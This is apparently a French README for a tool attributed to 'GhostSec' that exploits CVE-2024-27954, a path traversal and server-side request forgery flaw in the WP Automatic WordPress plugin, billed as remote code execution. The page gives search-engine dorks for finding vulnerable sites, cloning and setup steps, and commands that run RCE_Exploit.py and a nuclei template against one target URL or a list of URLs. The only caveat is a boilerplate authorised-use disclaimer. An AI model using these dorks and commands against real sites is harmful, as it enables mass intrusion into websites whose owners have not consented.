
Automatic Plugin pour WordPress < 3.92.1 Multiples vulnérabilités
💀 Automatic - Outils d'exploitation d'exécution de code à distance | Par GhostSec 💀
Vulnérabilité de limitation incorrecte d'un nom de chemin vers un répertoire restreint ('Path Traversal') dans WP Automatic Automatic permet le Path Traversal, la Server Side Request Forgery. Ce problème affecte Automatic : de n/a à 3.92.0.
body="wp-content/plugins/wp-automatic" && header="HTTP/1.1 200 OK"title:"wp-automatic" response.status_code:200http.title:"wp-automatic" http.status:200"/wp-content/plugins/wp-automatic"Clonez le dépôt :
git clone https://github.com/fa-rrel/CVE-2024-27954.git
cd CVE-2024-27954
Installez les paquets requis :
pip install -r requirements.txt
python RCE_Exploit.py -u <target_url> or <File.txt>
nuclei -t POC.yaml --target http://testphp.vulnweb.com/ or -l WPUrls.txt
Si vous trouvez cet outil utile et souhaitez soutenir le développement, pensez à m'offrir un café :

Cet outil est destiné uniquement à des tests de sécurité autorisés et à des fins éducatives. Toute utilisation non autorisée contre des systèmes est strictement interdite.
Cet outil est sous licence MIT.